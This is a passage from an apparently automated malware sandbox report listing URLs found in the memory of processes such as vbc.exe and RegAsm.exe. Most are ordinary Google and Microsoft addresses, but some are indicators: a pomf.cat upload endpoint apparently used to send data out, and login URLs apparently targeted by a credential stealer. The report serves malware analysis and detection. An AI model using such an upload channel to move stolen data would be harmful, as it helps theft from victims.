Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSkA3BhTLNTXreS8GxkTmsFGydHUKxWR3gtSn5&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQYaLHOGeTAvxcl2Kvu_RGdrblf1tOpndi7m5_OMgFvfzlI
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQc9-XcC69nXJpriIbLos4bSDdjrz_nByi2zL9xxJ4&s=10
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQcijPNIB_ZGSU0DrjPI_tJ1YOI-6PHUbyHUjTLi3M5nnkK
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQehqYcvOrRcw1YORGnrCzHbNyjMegefhpqYrPQO8G2_KPc
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQyeaAiOCtrhzoyiUuHOZcp67UWv4aYiYIKZ629tWqIyQ_l
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR6qDJUCBqqO8k81oIRUuLKwKNP-ux5oIGn1btf&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRXMqY1lU5NXqI7H2QRWgHFAYTsfVdew3_6QMhtv0g&s=10
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRZaO1x4iyU-YgxgvuerXdFmXdj8Ce3rNy8Mqw2SlqePXDg
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRlHYHZu1FxxbUNbpii9NbSF3wy4srqmfLAOC-QBxw&s
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS2yfg_cFEuqKFbNZCaFykqy-jW3vHyGM224t0Sov33iXvh
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS7Tsy61sPGCiV6yILYtCYyP2q9i9bHmXBPqktk0xQvTH0l
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS9bnSRFZj9kLnT0CeZ7r27C9IrO3sFLnQL62gz&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSHEjIxVJou5NRecC2n_FnHaUJDfppR3IDOglu2Ry9INoxt
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSKx7_Dt9K5OFgp-raiLw2XdVNOTbR27N_DCL6T8VDVN_16
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSTkM_f5rN2hSSg3E_UshkUpgZ0a66Lz0rF6gF6&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcScI5035wSfgyvpN8fX27BnFHfF4a7I8z7Xlm7v&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSpNsTsg--kCoAxXjTvRrABIfJjd5ITzVx14ODQUC4wDGzB
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSrCEL2r-B2oHHnS0EeiVjQLJYayeF4GHjCZod9vr4&s
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSvX77JsybkskW6WoLj5kY6exJKuOkXoRWSsNgJbFY&s
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9-gm37CbSVQ1QMRdyqOvdY12lHBO7fXpaqZZqKP2Wbjr2
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTKoe8A2_V1bWtOlP5fx10ZdjsJZv6l2_sKjTp6jVAPnp0g
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcThUknsbAksExwESRgK7TW5ujPLzgeGDT0-A3f5a1XrdyR-
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTo0t2j428kWHZlc2etqXbsI-zLrpgSp87E2H24&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v14/4UabrENHsxJlGDuGo1OIlLU94YtzCwA.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc-.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmSU5fBBc-.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc-.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQN
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBm
Source: bhv7420.tmp.6.dr String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrF
Source: bhv7420.tmp.6.dr String found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: bhv7420.tmp.6.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipOcdIDtTfqJElTfRhjdFP9dPcYlW61iEhrydiuX=w92-h92-n-k-no
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: vbc.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/Converged_v21033.css
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: vbc.exe, 00000006.00000003.717957775.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717882789.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718069987.000000000232F000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718028886.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717781094.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717689395.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717669606.0000000002337000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717735338.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717830836.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739322035.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739665751.00000000022BF000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739116233.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739573266.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739177781.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739468957.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739069223.00000000022C7000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739254376.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739360609.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898820172.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898386702.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898896783.000000000247F000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898673572.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898758123.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898519488.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898451200.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898604564.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898345595.0000000002487000.00000004.00000001.sdmp, bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2019-06-26-21-10-17/PreSignInSettingsConfig.json
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2019-06-26-21-10-17/PreSignInSettingsConfig.json?One
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json?One
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.086.0502.0006/OneDriveSetup.exe
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.103.0527.0003/update1.xml?OneDriveUpdate=d580ab8fe35aabd7f368aa
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=285df6c9c501a160c7a24c
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=4a941ab240f8b2c5ca3ca1
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://pki.goog/repository/0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: RegAsm.exe, 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp String found in binary or memory: https://pomf.cat
Source: RegAsm.exe, 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934360737.0000000002CCE000.00000004.00000001.sdmp String found in binary or memory: https://pomf.cat/upload.php
Source: RegAsm.exe, 00000005.00000002.934360737.0000000002CCE000.00000004.00000001.sdmp String found in binary or memory: https://pomf.cat80Vq
Source: RegAsm.exe, 00000005.00000002.934256237.0000000002C8A000.00000004.00000001.sdmp String found in binary or memory: https://pomf.catx&
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=28e3747a031f4b2a8498142b7c961529&c=MSN&d=http%3A%2F%2Fwww.msn
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://ssl.gstatic.com/gb/images/i1_1967ca6a.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=993498051.1601450642
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: vbc.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/async/bgasy?ei=gTJ0X7zPLY2f1fAPlo2xoAI&yv=3&async=_fmt:jspb
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&pq
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&ps
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/complete/search?q=ch&cp=2&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/complete/search?q=chr&cp=3&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/complete/search?q=chro&cp=4&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://www.google.com/complete/search?q=chrom&cp=5&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuse
